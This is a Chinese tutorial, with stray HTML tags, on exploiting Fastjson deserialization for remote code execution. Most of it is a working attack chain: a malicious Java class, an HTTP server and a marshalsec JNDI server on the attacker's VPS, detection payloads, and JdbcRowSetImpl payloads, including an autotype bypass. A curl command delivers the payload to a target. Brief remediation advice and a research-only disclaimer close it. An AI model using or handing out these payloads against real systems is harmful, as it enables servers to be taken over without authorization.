Fastjson 反序列化漏洞利用教学文档<\/h2>

1. 漏洞概述<\/h3>
Fastjson是阿里巴巴开源的一个高性能JSON处理库（Java语言）。该库在历史上存在多个反序列化远程代码执行（RCE）漏洞。攻击者通过精心构造恶意的JSON请求，可以诱使服务端在反序列化过程中加载并执行任意Java代码，从而完全控制服务器。<\/p>
核心漏洞原理<\/strong>：Fastjson在反序列化时，其`autotype<\/code>等特性允许指定任意类名，并自动调用该类的setter<\/code>方法、构造函数或特定getter方法。通过利用JNDI（Java Naming and Directory Interface）注入等技术，可以加载远程恶意类文件，最终实现RCE。<\/p>`

2. 关键漏洞点与利用条件<\/h3> 目标环境<\/strong>：使用存在漏洞版本的Fastjson（例如 <= 1.2.24, <= 1.2.47 等经典版本）的Java Web应用。<\/li> 触发点<\/strong>：任何接收JSON数据并调用JSON.parse()<\/code>或JSON.parseObject()<\/code>方法进行解析的接口。<\/li> 出网条件<\/strong>：目标服务器需要能够访问由攻击者控制的远程LDAP\/RMI服务（即能出网），以下载恶意class文件。<\/li> <\/ol> 3. 利用步骤详解<\/h3> 步骤一：环境准备 (攻击者侧)<\/h4> 编译恶意Java类<\/strong>：创建一个Java类，静态代码块或构造函数中包含要执行的命令。<\/p> \/\/ EvilObject.java <\/span><\/span><\/span><\/span>import<\/span> java.lang.Runtime;<\/span> <\/span><\/span>import<\/span> java.lang.Process;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> EvilObject<\/span> {<\/span> <\/span><\/span> public<\/span> EvilObject<\/span>(){<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> Runtime rt =<\/span> Runtime.<\/span>getRuntime<\/span>();<\/span> <\/span><\/span> String[]<\/span> commands =<\/span> {<\/span>"touch"<\/span>,<\/span> "\/tmp\/success"<\/span>};<\/span> \/\/ 示例命令：创建一个文件 <\/span><\/span><\/span><\/span> Process pc =<\/span> rt.<\/span>exec<\/span>(<\/span>commands);<\/span> <\/span><\/span> pc.<\/span>waitFor<\/span>();<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> \/\/ do nothing <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>使用javac EvilObject.java<\/code>编译，生成EvilObject.class<\/code>文件。<\/p> <\/li> 搭建恶意HTTP服务<\/strong>：将生成的EvilObject.class<\/code>文件放在一个目录下，并在该目录启动一个HTTP服务，确保class文件可通过URL访问（如 http:\/\/your-vps-ip:8000\/EvilObject.class<\/code>）。<\/p> python3 -m http.server 8000<\/span> <\/span><\/span><\/code><\/pre><\/li> 搭建恶意JNDI服务<\/strong>：使用开源工具（如 marshalsec<\/code>）启动一个恶意的RMI或LDAP服务，该服务会指向你的HTTP服务。<\/p> java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http:\/\/your-vps-ip:8000\/#EvilObject"<\/span> 1099<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 步骤二：漏洞探测与验证<\/h4> 向可疑的API端点发送精心构造的JSON数据包，根据响应判断是否存在漏洞。<\/p> DNSLog探测（无害）<\/strong>：使用java.net.InetAddress<\/code>类触发DNS查询，验证漏洞存在且目标可出网。<\/p> { <\/span><\/span> "@type"<\/span>: "java.net.Inet4Address"<\/span>, <\/span><\/span> "val"<\/span>: "your-dnslog-domain.dnslog.cn"<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>或者使用java.net.InetAddress<\/code>：<\/p> { <\/span><\/span> "@type"<\/span>: "java.net.InetAddress"<\/span>, <\/span><\/span> "val"<\/span>: "your-dnslog-domain.dnslog.cn"<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>观察你的DNSLog平台是否有解析记录。<\/p> <\/li> 报错回显探测<\/strong>：如果应用开启报错回显，可以发送无效的或触发异常的内容，通过报错信息判断是否使用Fastjson。<\/p> {"x"<\/span>: "a"<\/span> <\/span><\/span><\/code><\/pre>典型的Fastjson报错会包含com.alibaba.fastjson.JSONException<\/code>等字样。<\/p> <\/li> <\/ol> 步骤三：构造利用Payload<\/h4> 确认漏洞存在后，构造最终的RCE Payload。Payload的核心是利用Fastjson的autotype<\/code>机制，通过JNDI注入加载远程恶意类。<\/p> 经典Payload (Fastjson <= 1.2.24)<\/strong>：<\/p> { <\/span><\/span> "@type"<\/span>: "com.sun.rowset.JdbcRowSetImpl"<\/span>, <\/span><\/span> "dataSourceName"<\/span>: "rmi:\/\/your-vps-ip:1099\/EvilObject"<\/span>, <\/span><\/span> "autoCommit"<\/span>: true<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>高版本绕过Payload (例如 Fastjson <= 1.2.47)<\/strong>：高版本限制了autotype<\/code>。可以利用其缓存机制进行绕过。<\/p> { <\/span><\/span> "@type"<\/span>: "java.lang.Class"<\/span>, <\/span><\/span> "val"<\/span>: "com.sun.rowset.JdbcRowSetImpl"<\/span> <\/span><\/span>},<\/span> <\/span><\/span>{ <\/span><\/span> "@type"<\/span>: "com.sun.rowset.JdbcRowSetImpl"<\/span>, <\/span><\/span> "dataSourceName"<\/span>: "ldap:\/\/your-vps-ip:1389\/EvilObject"<\/span>, <\/span><\/span> "autoCommit"<\/span>: true<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>步骤四：发送Payload并执行<\/h4> 使用curl、Burp Suite等工具，向目标URL发送POST请求，Content-Type为application\/json<\/code>，Body为上述构造的JSON Payload。<\/p> 示例curl命令<\/strong>：<\/p> curl -X POST \ <\/span><\/span><\/span><\/span> -H "Content-Type: application\/json"<\/span> \ <\/span><\/span><\/span><\/span> -d '{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi:\/\/your-vps-ip:1099\/EvilObject","autoCommit":true}'<\/span> \ <\/span><\/span><\/span><\/span> "http:\/\/target-url.com\/api\/endpoint"<\/span> <\/span><\/span><\/code><\/pre>4. 漏洞修复与防御建议<\/h3> 升级Fastjson<\/strong>：立即升级到最新安全版本（目前最新安全版本 > 1.2.83）。<\/li> 关闭autotype<\/strong>：在启动参数或代码中设置ParserConfig.getGlobalInstance().setAutoTypeSupport(false);<\/code>。<\/li> 使用安全白名单<\/strong>：如果必须使用autotype，应配置addAccept()<\/code>方法设置严格的白名单。<\/li> 网络层面<\/strong>：在网络边界限制服务器不必要的出网访问。<\/li> WAF防护<\/strong>：部署WAF设备或规则，对请求中的@type<\/code>、JdbcRowSetImpl<\/code>、rmi:\/\/<\/code>、ldap:\/\/<\/code>等关键词进行过滤。<\/li> <\/ol> 5. 补充说明<\/h3> 不出网利用<\/strong>：如果目标服务器无法出网，利用难度极大。可能需要寻找存在危险代码或构造链的本地类（如TemplatesImpl<\/code>）进行利用，构造过程更为复杂。<\/li> 工具化<\/strong>：此漏洞已有成熟的工具化利用方案，例如fastjson_tool.jar<\/code>、JNDI-Injection-Exploit<\/code>等，可以自动化完成漏洞探测和利用。<\/li> <\/ul> 免责声明<\/strong>：本文档仅用于安全研究与教学目的，旨在帮助用户了解漏洞原理并采取有效防护措施。请勿将其用于任何非法或未授权的测试活动。<\/p>